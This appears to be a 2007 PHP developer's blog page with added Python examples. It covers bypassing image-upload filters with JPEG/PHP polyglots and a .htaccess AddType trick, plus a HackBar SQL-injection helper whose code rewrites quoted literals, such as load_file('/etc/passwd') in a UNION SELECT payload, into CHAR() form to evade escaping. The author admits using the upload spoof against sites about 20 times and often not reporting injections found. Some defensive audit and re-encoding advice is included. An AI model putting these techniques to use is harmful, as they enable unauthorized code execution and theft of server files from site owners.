Tuesday, June 26, 2007

PHP Image uploaders

Image uploads are pretty common these days: you get them in most forums, weblogs, community sites etc. There are basically two ways of determining whether an uploaded file is an actual image.

1: Check the file extension. This should be gif, jpg or png.
2: Check the file layout, using the PHP getimagesize() function, which is way cooler, because it looks inside the file instead of trusting its name.

If by chance the developer wasn't paying attention and doesn't check the extension properly, but does use getimagesize() to determine the image type, you can upload a 'special' file that passes all the PHP image checks and still executes the embedded PHP. The reason is that getimagesize() only parses the image header (type and dimensions); it never looks at what comes after the image data.

Just take a basic JPEG image (yes, your avatar will do), open it in your favorite hex editor, open your PHP file next to it, and copy-paste the PHP hex data below the image hex data. (Appending the PHP file to the image on the command line does exactly the same thing.)

Next, rename file.jpg to file.php and try to upload it.

The thing with JPEG is that it isn't bothered by excess data: a decoder stops at the end-of-image marker (FF D9) and ignores whatever follows. PHP, on the other hand, just echoes a file's contents until it finds those cute <?php tags, and executes what is inside them. So when this 'image' is requested from the web server as a .php file, the browser gets the JPEG bytes followed by the output of your code, exactly like a normal PHP file.
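The polyglot and the two checks it has to get past, as an added example (not code from the original post). It constructs a minimal JPEG byte stream inline, appends a hypothetical PHP payload, shows that a header-only parse in the style of getimagesize() still reports a valid 1x1 JPEG, and then shows the defender-side check that does catch it: anything after the EOI marker, or a PHP open tag anywhere in the file. The function and constant names are the example's own.

```python
import struct

# Constructed sample input, not a real photo: a minimal JPEG byte stream with
# SOI, a JFIF APP0 segment, a SOF0 segment declaring 1x1 pixels, and EOI.
# It carries no scan data, so it will not render, but it is enough for a
# header-only check (what PHP's getimagesize() performs) to report "JPEG, 1x1".
MINIMAL_JPEG = (
    b"\xff\xd8"                                                      # SOI
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"  # APP0
    b"\xff\xc0\x00\x11\x08\x00\x01\x00\x01\x03"                      # SOF0
    b"\x01\x11\x00\x02\x11\x01\x03\x11\x01"                          # 3 components
    b"\xff\xd9"                                                      # EOI
)

# Hypothetical payload: the code that gets pasted behind the image.
PHP_PAYLOAD = b"<?php echo 'hello from the image'; ?>"

SOF_MARKERS = {0xC0, 0xC1, 0xC2, 0xC3, 0xC5, 0xC6, 0xC7,
               0xC9, 0xCA, 0xCB, 0xCD, 0xCE, 0xCF}
STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))  # markers with no length field


def make_polyglot(jpeg: bytes, php: bytes) -> bytes:
    """The hex-editor step from the post: image bytes first, PHP source after."""
    return jpeg + php


def jpeg_dimensions(data: bytes):
    """Header-only parse in the spirit of getimagesize(): walk the marker
    segments until the first SOF and return (width, height). Everything after
    the image header, including appended PHP, is never looked at."""
    if data[:2] != b"\xff\xd8":
        return None
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker in STANDALONE:
            pos += 2
            continue
        (seglen,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if marker in SOF_MARKERS:
            height, width = struct.unpack(">HH", data[pos + 5:pos + 9])
            return width, height
        pos += 2 + seglen
    return None


def jpeg_end_offset(data: bytes):
    """Offset just past the EOI marker (FF D9), or None if there is none.
    Segments are skipped by their declared length, so an EOI inside an EXIF
    thumbnail is not mistaken for the real one; inside entropy-coded data every
    0xFF is byte-stuffed, so the first FF D9 after SOS is the real EOI."""
    if data[:2] != b"\xff\xd8":
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xD9:
            return pos + 2
        if marker == 0xDA:                       # SOS: scan data follows
            eoi = data.find(b"\xff\xd9", pos)
            return None if eoi < 0 else eoi + 2
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        (seglen,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + seglen
    return None


def trailing_bytes(data: bytes) -> bytes:
    """Whatever a JPEG decoder ignores: the bytes after EOI."""
    end = jpeg_end_offset(data)
    return b"" if end is None else data[end:]


def audit_upload(data: bytes) -> list:
    """Defender-side check that rejects the polyglot. Returns the reasons for
    rejection; an empty list means the file looks like a plain JPEG."""
    reasons = []
    if jpeg_dimensions(data) is None:
        reasons.append("not a JPEG")
    elif jpeg_end_offset(data) is None:
        reasons.append("no EOI marker")
    else:
        extra = len(trailing_bytes(data))
        if extra:
            reasons.append(f"{extra} bytes after EOI")
    tag = data.find(b"<?php")          # short tags (<? and <?=) are not covered here
    if tag >= 0:
        reasons.append(f"PHP open tag at offset {tag}")
    return reasons


if __name__ == "__main__":
    poly = make_polyglot(MINIMAL_JPEG, PHP_PAYLOAD)
    print("header check says:", jpeg_dimensions(poly))   # (1, 1): the check passes
    print("audit says:", audit_upload(poly))
```

The audit is a detection aid, not the fix. The robust server-side fix is to never trust the uploaded bytes or name at all: re-encode the picture (in PHP, imagecreatefromstring() followed by imagejpeg()/imagepng()), which drops everything after the image data, and store it under a server-generated filename with an extension derived from the detected type, in a directory the web server does not execute scripts from.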

I have used this image spoof about 20 times now, and it worked about 5 times. So it's a long shot, but surely worth a try.

PS:
If it doesn't work, try uploading a .htaccess file containing: AddType application/x-httpd-php .jpg
and then upload your .php file as a .jpg file. Because of the weird filename layout (.htaccess == no filename and a suspiciously long file extension) some upload checks let it pass through (older versions of FCKeditor, for example). Note that this only does something when the upload directory is served by Apache with mod_php and AllowOverride permits FileInfo directives in .htaccess; otherwise the AddType line is simply ignored.

Security and its ethics

'Cool I hacked some site! I must now tell the owner (whoever that may be) how he should fix his bogus security.. and of course, what a 1337 H@xor I am!'..

When I find SQL injections, most of the time I don't even bother telling the owner of the site, unless of course it's something big and important and lives are (or my money is) at stake. Most of the time you get a lame reply or none at all.. and this made me think.

Finding security leaks is fun for me, it's a challenge. When I'm actually IN, I lose interest real fast. The rush you get when you get closer and closer is the best there is! The thing is.. telling the owner you were in his backend, proving it with pretty screenshots, is roughly equivalent to forcing your way into his living room and sending him a postcard afterwards (with you in it.. on his couch.. watching his p0rn). What more can we expect but a pale-faced: "Thank you for not telling anyone.."?

This is different for the bigger companies. They have the beauty of bureaucracy! This is just a fancy word for: "Hi Boss, I didn't do it, it was that guy over there.. oh wait.. he quit a few weeks ago.. you want me to fix it? I'd be happy to!"

This is even more different for the really big companies with a security team on top. They tend to sue you to death, or if they are really impressed, hire you! (probably worse)
Just picture yourself in a bank vault, explaining your 'bendy paperclip technique' that allowed you to open the door while disabling any surrounding cameras or alarms.. pure horror!

So.. it's better not to say anything.. is it? Well no.. the best thing I can think of is: just be real careful when you do tell. Don't try to be the all-knowing hacker that saved them from a pitiful doom. Just tell them what you do, why you do it, and... what you did :)

Or even better, contact them in advance and ask them if it's ok. I did it a few times, it works great. The only problem is that this approach kind of kills the ninja feeling of it all.. but that's just me I guess.

Hackbar 1.1.1

I have released the new version of the HackBar Firefox plugin. Well.. not exactly.. I released it a month ago, but it should be on this blog, so here it is.

>> So... why the lame name?
<< Well.. it started out as a joke. I wanted to write a Firefox plugin, and I was fed up with the confusing and unreadable URL when performing SQL injections. So a lame textarea toolbar was born. I decided to call it HackBar.. because that's what it helps you do.. doesn't it? After a while I saw the error of my ways. The first problem was getting it through the Firefox plugin people. That took about a month.. And now it's not just my toy, it's anyone's toy.. And apparently it's my problem that it's not available in Chinese.. or some other language I can't read.

Anyway, heres the link: https://addons.mozilla.org/en-US/firefox/addon/3899


Hackbar 1.1.1 description

# New features
- Show / Hide hotkey [F9]
- Tab sensitive
- Auto load, split and focus when pressing hotkey on a new URL.
- Localized ( English and Dutch for now )
- Textarea width set to 100% (removed dragbar)
- Complete code revision (OO based instead of functions)

# In general
This toolbar will help you in testing SQL injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site. Its main purpose is to help a developer do security audits on his own code. If you know what you're doing, this toolbar will help you do it faster. If you want to learn to find security holes, you can also use this toolbar, but you will probably also need a book and a lot of Google :)

# The advantages are:
- Even the most complicated URLs will be readable
- The focus stays on the textarea, so after executing the URL (ctrl+enter) you can just go on typing / testing
- The URL in the textarea is not affected by redirects.
- I tend to use it as a notepad :)
- Useful tools like on-the-fly UU/URL decoding etc.
- All functions work on the currently selected text.


# Load url ( alt a )
This loads the URL of the current page into the textarea.

# Split url ( alt s )
When this button is clicked, the URL/text in the textarea is split into multiple lines at the ? and & characters.

# Execute ( alt x, ctrl enter )
This executes the current URL in the textarea; I mostly use ctrl+enter.

# INT -1 ( alt - )
First select a number in the textarea and press this button; the number is lowered by 1 and the URL is loaded.

# INT +1 ( alt + )
Again, first select a number in the textarea and press this button; 1 is added to the number and the URL is loaded.

# MD5 Hash ( alt m )
MD5 is a standard hashing function, often (mis)used to store passwords; note that it hashes, it does not encrypt. This button MD5 hashes the currently selected string.

# MySQL CHAR() ( alt y )
If quotes are escaped but you did find an SQL injection that's exploitable, you can use this button to convert, let's say:
load_file('/etc/passwd') --> load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))
thus omitting the use of quotes to load a file.
You can also use this on
WHERE foo LIKE ('%bar%') --> WHERE foo LIKE (CHAR(37, 98, 97, 114, 37))

# MsSQL CHAR() ( alt q )
Same story as MySQL CHAR(), but MSSQL's CHAR() takes a single code, so the pieces are concatenated with +:
--> WHERE foo LIKE ( CHAR(37) + CHAR(98) + CHAR(97) + CHAR(114) + CHAR(37))

# Base64 encode / decode
Base64 encoding (called UU in the toolbar) is often used to store data (like a return URL etc.). This will help you read those values.

# URLencode / decode
This will encode or decode the currently selected characters to URL-safe characters. I mostly use it to end a query with # (%23) when injecting into a pseudo-path (path-info style URL) where I can't use /* or --. The # has to be encoded: a bare # in the address bar is treated as a fragment by the browser and never reaches the server.
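The MySQL CHAR(), MsSQL CHAR() and URL-encode steps above, as an added example in Python (not HackBar's own code, which is a Firefox extension). It goes a little beyond the single-literal buttons: quote_free() rewrites every single-quoted literal in an SQL fragment for the chosen dialect, and path_segment() prepares a payload for a pseudo-path URL with the encoded # terminator. All names are the example's own.

```python
import re
from urllib.parse import quote, unquote


def mysql_char(text: str) -> str:
    """MySQL CHAR() accepts a list of byte values and returns one string:
    '/etc/passwd' -> CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)"""
    return "CHAR(" + ", ".join(str(b) for b in text.encode()) + ")"


def mssql_char(text: str) -> str:
    """MSSQL CHAR() takes one value, so each byte becomes its own call and the
    pieces are glued together with +."""
    return " + ".join(f"CHAR({b})" for b in text.encode())


CONVERTERS = {"mysql": mysql_char, "mssql": mssql_char}

# Plain single-quoted literals only; escaped quotes inside a literal are not handled.
_LITERAL = re.compile(r"'([^']*)'")


def quote_free(fragment: str, dialect: str = "mysql") -> str:
    """Rewrite every quoted literal in an SQL fragment into CHAR() form, which is
    what you need when the application escapes or strips quotes but the
    injection point itself is still live."""
    convert = CONVERTERS[dialect]
    return _LITERAL.sub(lambda m: convert(m.group(1)), fragment)


def path_segment(fragment: str) -> str:
    """Prepare a payload for a pseudo-path URL (/news/view/<here>): URL-encode
    everything, including the slashes, and end the query with an encoded '#'.
    A bare '#' would be taken by the browser as a fragment and never sent."""
    return quote(fragment + "#", safe="")


def url_decode(segment: str) -> str:
    """The reverse step, for reading what an application put in its own URLs."""
    return unquote(segment)


if __name__ == "__main__":
    print(quote_free("load_file('/etc/passwd')"))
    print(quote_free("WHERE foo LIKE ('%bar%')", "mssql"))
    print(path_segment("1 UNION SELECT " + quote_free("load_file('/etc/passwd')")))
```

quote() with an empty safe set also encodes the slashes inside a CHAR()-free path such as /etc/passwd, which is exactly why the literal is converted to CHAR() first: the encoded payload then contains no quote and no slash that a path-info router could misread as a segment separator.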


Cool! Another blog full of crap... about stuff!

Yep.. you're so right!

I'm a PHP developer. I'm interested in lots of things, mostly web development, and I needed an outlet. So here we are.

Security is something I like to play with; it's nice out-of-the-box thinking. A fitting description would be "a jigsaw puzzle without the pretty picture.." But that would just be plain silly.

Next to that I tend to release some scripts and applications onto the world...
So now you know.. bear with me :)